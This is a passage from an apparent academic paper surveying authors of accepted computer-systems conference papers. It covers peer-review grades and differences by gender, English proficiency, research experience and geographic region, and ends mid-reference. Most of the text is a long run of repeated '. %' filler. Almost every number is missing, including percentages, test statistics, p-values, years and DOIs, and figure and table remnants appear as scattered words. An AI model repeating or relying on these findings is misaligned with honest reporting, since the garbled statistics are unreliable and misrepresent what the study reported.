. % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . 
% . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . 
% . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . 
% . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . 
% . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . % . . . . . overall technical presentation impact originality relevance confidence category n o rm a liz e d g ra d e figure normalized scores and response distribution. diamonds represent mean scores. bars repre- sent median scores, with a notched -pct confidence. n is the number of scores received in each category. shown below n is the percentage of conferences that used each grade category. full-size doi: . /peerjcs. /fig- conceivably, an out-of-scope paper could simply get rejected and excluded from our dataset. alternatively, this grade could be so important that papers are at a much higher risk of rejection if they are mismatched with the conference’s scope, even if they rank well in the other categories. 
unfortunately, without data on rejected papers we do not have enough information to discriminate between these two extremes. discussion and author diversity in this section we address differences in survey responses based on aspects of author diversity that arise from the available data. gender women represent only approximately – % of cs researchers overall (wang et al., ). in our data, the percentage is about half that, with only . % female survey respondents. what factors could explain this lower ratio? one potential explanation is selection bias: women might be less inclined to respond to this survey. however, the percentage of women across respondents and nonrespondents alike, %, is actually very close. another explanation may be that women publish less than men in systems. indeed, women in our dataset did average fewer total past publications: . compared to men's . . nevertheless, this gap is not large enough to explain the – x representation gap with the rest of cs and is not unique to systems (elsevier, ). a third explanation could be that female authors' papers are rejected at a higher rate than males'. we cannot test this hypothesis directly without data on rejected papers. however, three pieces of evidence weaken this explanation:
1. the ratio of women in the double-blind conferences, where reviewers presumably remain oblivious of the authors' gender, is in fact slightly lower than for single-blind conferences ( . % vs. . %, χ = . , p= . ). this ratio does not support an explanation that reviewers reject females at a higher rate when they can look up the author's gender.
2. when we limit our observation to lead authors only, where the author's gender may be more visible to the reviewers, the ratio of women is actually slightly higher than in the overall author population ( . % vs. . %, χ = . , p= . ). if we assume no differences in the submission rates to a conference based on gender, then female lead authors appear to suffer no more rejections than male authors.
3. we found no statistically significant differences in the overall acceptance grades of women and men (t = . , p= . ), even when limiting to lead authors (t = . , p= . ), papers accepted on their first attempt (t = . , p= . ), or single-blind reviews (t = . , p= . ). this equitability extends to most other grade categories, except for originality (t = . , p < . ) and technical merit in single-blind conferences (t = . , p= . ). in both categories, women scored significantly higher than men. it remains unclear whether there is any causal relationship here, and if so, in which direction; do women have to score higher than men in the technical categories to be accepted in single-blind conferences, or do women submit higher-quality papers to begin with? at any rate, this small difference is unlikely to explain the – x difference in women's ratio compared to cs, but it does provide a case for wider adoption of double-blind reviewing.
these distinctions were not the only gender differences in our survey. women also reported reviewers as somewhat more understanding, helpful, and fair than men did (χ = . , p= . , χ = . , p= . , and χ = . , p= . , respectively). on the other hand, papers authored by women averaged a few more prior submissions: . compared to men's . (t = . , p= . ). note, however, that review quality and prior submissions are strongly linked.
in other words, a paper with a longer submission history tends to rate higher on reviewer understanding, helpfulness, and fairness. when correcting for submission history length, these gender differences lose statistical significance. in summary, our data does not exhibit large statistical gender differences in the review process, and in particular it does not help to explain the large gender gap in systems. addressing this problem may require focusing our attention elsewhere (ceci & williams, ). english proficiency another aspect of diversity in scientific publication is english-level proficiency (lee et al., ; murray et al., ). all of the papers, reviews, and communications in our conferences were conducted in english, but many authors and reviewers are nonnative english speakers (nnes). the effective use of language can affect both reviewers' understanding of the works and authors' understanding of the reviews (crovella, ; editage insights, ; flowerdew, ; flowerdew, ). how does the author experience vary based on this factor? at least in our dataset, the answer appears to be "not much." from an objective grading perspective, all but one of the review categories exhibit very similar distributions, both for teams with native english speakers and for teams with none. these categories include the presentation grade (t = . , p= . ), where language skills presumably would make the most difference. the only exception was the originality grade, where teams with no native speakers averaged a normalized grade that was slightly higher than the native speakers' teams ( . vs. . , t = . , p= . ). as for the subjective experience of authors, nnes do feel differently about how well reviewers understand their work (χ = . , p= . ), but perhaps not in the way that we would expect; of those reviews with reportedly poor understanding, only . % were from all-nnes teams, compared to . % all-nnes teams in the better-understood reviews. the overall rate of nnes teams among survey responses was . %, so clearly most of them did not feel misunderstood. similar to women, nnes average higher prior submissions, . , compared to native speakers' . (t = . , p= . ), which may be the stronger explanatory variable. we also tried to look in the opposite direction: how does the english level of the reviewers affect how well understood the authors feel? we do not know who reviewed whose paper, or even a reviewer's native language or nationality. however, we can try to estimate it indirectly by looking at their affiliation's country. we first guess the country of residence of reviewers by looking at their email affiliation, extract a country when possible, and look up whether this country includes english as one of its official languages. we then look at the conference pc overall demographics and assign each conference a value corresponding to the percent of pc members affiliated with an english-speaking country. program committees range from % english speakers (socc) to % (europar), and average . %. as it turns out, this proportion has no significant association with the reported understanding level of the reviews for the conference.
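the reviewer-language estimate described above boils down to a per-conference aggregation over pc email domains. the sketch below is a minimal illustration of that computation, assuming a hand-built lookup from country-code email suffixes to whether english is an official language; the table, the generic-tld handling, and the example addresses are illustrative assumptions, not the authors' actual pipeline:

```python
# Hypothetical lookup: email country-code suffix -> English is an official language there.
ENGLISH_OFFICIAL = {"us": True, "uk": True, "gb": True, "au": True, "ca": True,
                    "de": False, "fr": False, "cn": False, "jp": False}

def english_speaking_share(pc_emails):
    """Estimate the percent of PC members affiliated with an English-speaking country."""
    known = english = 0
    for email in pc_emails:
        tld = email.rsplit(".", 1)[-1].lower()
        country = "us" if tld in {"edu", "gov", "mil"} else tld  # generic TLDs treated as US-based
        if country in ENGLISH_OFFICIAL:  # "extract a country when possible"
            known += 1
            english += ENGLISH_OFFICIAL[country]
    return 100.0 * english / known if known else float("nan")

# toy program committee: three identifiable countries, one of them non-English-speaking
print(english_speaking_share(["a@cs.stanford.edu", "b@inria.fr", "c@imperial.ac.uk"]))
```

each conference's pc list would be run through such a function to obtain the per-conference percentage that is then compared against the reported review-understanding responses.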
these negative findings could suggest that in the overall picture of systems research, english proficiency is merely one resource in the multidimensional skill set required to publish successfully (bardi, ; ferguson, pérez-llantada & plo, ; rozycki & johnson, ) and that the binary distinction of native/nonnative speaker may be inadequate to capture even this skill alone.
[figure: distribution of past publications of all authors, near the time of their first publication; x-axis: number of previous publications (log scale), y-axis: proportion of authors.]
publication experience as mentioned in the methods section, we collected data from authors' gs profile whenever available and uniquely identifiable ( . % of our survey respondents). we can use this bibliometric data as an approximate proxy for the previous research experience of authors. for example, fig. depicts the distribution of one such metric, the number of previous publications of each author (circa their conference's date), which appears approximately log-normal. since we collected this metric for all authors, not just survey respondents, we can compare the distributions for both populations. both distributions are similar enough to lead us to believe that no selection bias by experience occurred in this survey (t = . , p= . ). we can also look at the more complex h-index metric (hirsch, ) to evaluate differences in response rate by researcher seniority. some . % of respondents had an h-index of or less, roughly corresponding to the percentage of self-identified students. this percentage is nearly identical in the overall author population ( . %), again confirming that the large number of students in our survey is representative of the author population. this large representation of students is important in light of our previous findings about the differences between survey responses of students and of more experienced researchers. for example, students in our survey overwhelmingly prefer a rebuttal process. more experienced researchers commented in the survey that they tend to value this process less, which may affect conference policies, because those are also decided by experienced researchers. nevertheless, their high value to inexperienced researchers (as well as nnes) may render the effort worthwhile (langford, ).
[table: number and percentage of survey respondents and total authors by geographical region, in descending number of total authors; columns: region, respondents, percentage, all authors, percentage; rows: northern america, eastern asia, western europe, northern europe, southern europe, western asia, southern asia, south-eastern asia, australia and new zealand, south america, eastern europe.]
as previously discussed, we found no correlation between the experience of a paper's lead author and its research or submission history in months and submissions. the same is true when comparing the number of past rejections with the past publications of a paper's most-experienced author (r = . , p= . ), least-experienced, mean and median experience. we also found no correlation between an author's experience and their response to the understanding or helpfulness of the reviews.
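the experience proxies used above are straightforward to compute. as a hedged illustration, the sketch below derives hirsch's h-index (the largest h such that an author has h papers with at least h citations each) from a citation list and then runs the kind of experience-versus-rejections correlation check reported above; the author data is made up rather than taken from the survey:

```python
from scipy import stats

def h_index(citations):
    """Hirsch's h-index: the largest h such that h papers have at least h citations each."""
    ranked = sorted(citations, reverse=True)
    return sum(1 for rank, c in enumerate(ranked, start=1) if c >= rank)

# hypothetical authors: (citation counts of their past papers, past rejections of the surveyed paper)
authors = {
    "a": ([50, 31, 20, 9, 4, 1], 0),
    "b": ([12, 8, 3, 2], 2),
    "c": ([90, 60, 44, 30, 25, 11, 7], 1),
    "d": ([5, 2, 1], 3),
}
experience = [h_index(cites) for cites, _ in authors.values()]
rejections = [rej for _, rej in authors.values()]

r, p = stats.pearsonr(experience, rejections)  # same style of test as in the analysis above
print(f"h-indices={experience}, r={r:.2f}, p={p:.2f}")
```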
we believe that these negative findings are an overall positive indication that the peer-review process is fair and blind to experience, although a full analysis requires incorporating rejected papers as well. we did find a weak association, however, between authors' experience and the reviews' perceived fairness (χ = . , p= . ), which was also observed in the isca community for fairness and helpfulness (jerger et al., ). geographical regions although we did not specifically ask authors for their country of residence, we can infer this information for most authors from their email addresses. we can then aggregate authors based on the region of the world that their email affiliation belongs to and compare the distribution of ratios between survey respondents and all of the authors. table shows these distributions (omitting any authors with unidentifiable country and any regions with two authors or fewer). it is encouraging to see that the two distributions are fairly similar (t =− . , p= . ), which suggests that any selection bias based on geographical region is also limited. unsurprisingly, most of these researchers hail from the west, much more so than in other fields (clarivate analytics, ). one possible explanation is that systems research can require expensive hardware, and is therefore more likely to occur in the well-endowed research institutions and companies of the developed world. regardless of explanation, this data shows a strong dissonance between country population and representation in published systems research, leading in turn to poor geographical diversity. a final point of interest is to combine all these metrics to look at nnes who migrate to or reside in an english-speaking country. of the respondents with an identifiable email affiliation, reside in the us, and more in the uk, canada, and australia. of the us-based researchers, . % identify as nnes. this group of migrants and visitors exhibits different demographic characteristics than the native us researchers. these migrants show a higher rate of students ( % vs. . %, χ = . , p < . ), which coincides with a lower research experience (median h-index of vs. , t =− . , p < . ), and a somewhat higher rate of academic sector affiliation ( . % vs. . %, χ = . , p= . ). these immigrants and visitors, however, exhibit the same gender imbalance as the locals, with a female respondent rate of % vs. . % (χ = . , p= . ). conclusions and future work this paper presented a new survey of conference authors, exposing the experience of authors across a large section of computer systems. we placed a strong emphasis on examining responses across various author demographics and found no selection bias based on the authors' gender, experience, position, geographical region, or paper. we think these responses are representative of authors of accepted papers throughout the field of systems, and can be used to inform future conference policies, such as double-blind reviews and author rebuttal. the former remains an important research question, and we plan to explore it with our survey data in future work. most survey takers found the opportunity to respond to reviewers valuable, even if it did not change their review grades.
the implication for pc chairs, and by extension, educators, may be that while a response process to technical feedback is of little value to experienced practitioners, novices do find it overwhelmingly helpful. students are well represented in this survey, possibly because systems research often requires elaborate implementation efforts, including multiple graduate students. students' responses to the survey could be useful for conferences with an educational mission to better address this target audience. a related finding is that longer feedback is generally perceived as more helpful, understanding, and fair, which in turn may serve as another factor in improving students' experience. overall, we found that published authors in systems exhibit a good mix of work sectors, research experience, and english proficiency, but poor diversity across gender and geographical regions. women in particular represent an alarmingly small group of authors in systems research, and this paper looked at whether the peer-review process plays a role in this underrepresentation, as has been found in some grant and job evaluations (lee et al., ). for female authors of accepted papers, we found that their papers tend to have a slightly longer submission history. however, we found little evidence of negative outcomes in the reviews that they received or experience they perceived, even when their identity is known to the reviewers. nonnative english speakers also appear to experience no specific adverse effects from peer review, and in fact often report more positively on their experiences than native speakers. both of these findings can help focus the diversity effort on other policies, at least for accepted authors. the larger question of nativism in peer review requires data on rejected papers, and is not answered in this paper. in terms of conference policies, the two main qualitative conclusions that we draw from the quantitative results are that from the authors' perspective, review response or rebuttal can be very valuable, and that short reviews often are not. conference chairs may take these findings into consideration in their review policies, especially if they intend to attract junior researchers. this dataset remains rich for exploration of the many questions that fell outside the scope of this paper, such as the following:
• why is the representation of women in systems so low?
• do women actually need to receive higher technical scores in their reviews just to be accepted to single-blind conferences?
• what are the effects of double-blind reviewing on the quality of reviews, conferences, and papers?
• what other publication differences and commonalities exist between systems and the rest of cs?
• how do review grades correlate across categories?
• how might reviewer load affect our results?
• how do any of these factors affect the eventual success of a paper, as measured by awards or citations?
we plan to address these questions and others in subsequent research. our hope is that by opening up all of the nonprivate data we collected, we also open the door for other researchers to validate our results, extend them, or collaborate on future studies. acknowledgements this work has been supported by the advice of kelly mcconnville and andrew bray at reed college. we also thank fred douglis, jim fix, anna ritz, and eric roberts for their helpful remarks.
additional information and declarations funding this work was supported by a grant from the office of the dean of the faculty at reed college. the funders had no role in study design, data collection and analysis, decision to publish, or preparation of the manuscript. grant disclosures the following grant information was disclosed by the authors: dean of the faculty at reed college. competing interests the authors declare there are no competing interests. author contributions
• eitan frachtenberg conceived and designed the experiments, analyzed the data, performed the computation work, prepared figures and/or tables, authored or reviewed drafts of the paper, and approved the final draft.
• noah koster performed the experiments, performed the computation work, authored or reviewed drafts of the paper, and approved the final draft.
ethics the following information was supplied relating to ethical approvals (i.e., approving body and any reference numbers): this study and the survey questions were approved by the reed college irb (number -s ). data availability the following information was supplied regarding data availability: all the code and data (except confidential survey responses) are available at github: http://github.com/eitanf/sysconf. a snapshot of this repository is also available as a supplementary file. additionally, the complete survey questionnaire and anonymized individual survey responses are available as a supplemental file. supplemental information supplemental information for this article can be found online at http://dx.doi.org/ . /peerj-cs. #supplemental-information. references anderson t. . towards a model of computer systems research. proceedings of the workshop on organizing workshops, conferences, and symposia for computer systems. available at https://www.usenix.org/legacy/event/wowcs /tech/full_papers/anderson /anderson.pdf. bardi m. . learning the practice of scholarly publication in english–a romanian perspective. english for specific purposes : – doi . /j.esp. . . . beverly r, allman m. . findings and implications from data mining the imc review process. acm sigcomm computer communication review ( ): – doi . / . . ceci sj, williams wm. . understanding current causes of women's underrepresentation in science. proceedings of the national academy of sciences of the united states of america ( ): – doi . /pnas. . clarivate analytics. . global state of peer review. available at https://publons.com/static/publons-global-state-of-peer-review- .pdf. crovella m. . openness of the sigcomm conference. available at http://blog.sigcomm.org/ / /openness_of_the_sigcomm_confer.html. daume h. . some naacl statistics on author response, review quality, etc. natural language processing blog. available at https://nlpers.blogspot.com/ / /some-naacl- -statistics-on-author.html.
destefano l. . analysis of micro conference diversity survey results. available at https://www.microarch.org/docs/diversity-survey- .pdf. editage insights. . author perspectives on academic publishing: global survey report . available at https://campaign.editage.com/global_survey_report_ /. elsevier. . gender in the global research landscape. available at https://www.elsevier.com/research-intelligence/campaigns/gender- . ernst e, resch k-l. . reviewer bias: a blinded experimental study. the journal of laboratory and clinical medicine ( ): – . ferguson g, pérez-llantada c, plo r. . english as an international language of scientific publication: a study of attitudes. world englishes ( ): – doi . /j. - x. . .x. flowerdew j. . writing for scholarly publication in english: the case of hong kong. journal of second language writing ( ): – doi . /s - ( ) - . flowerdew j. . attitudes of journal editors to nonnative speaker contributions. tesol quarterly ( ): – doi . / . fortnow l. . time for computer science to grow up. communications of the acm ( ): – . fox mf. . women, men, and engineering. in: fox ma, johnson dg, rosser sv, eds. women, gender, and technology. urbana: university of chicago press, – . frachtenberg e, kaner r. . representation of women in high-performance computing conferences. in: first summit on women in high-performance computing. vancouver: whpc april . franceschet m. . the role of conference publications in cs. communications of the acm ( ): – . françois o. . arbitrariness of peer review: a bayesian analysis of the nips experiment. arxiv preprint. arxiv: . . gans js, shepherd gb. . how are the mighty fallen: rejected classic articles by leading economists. journal of economic perspectives ( ): – . hames i. . peer review and manuscript management in scientific journals: guidelines for good practice. oxford, uk: john wiley & sons. hirsch je. . an index to quantify an individual's scientific research 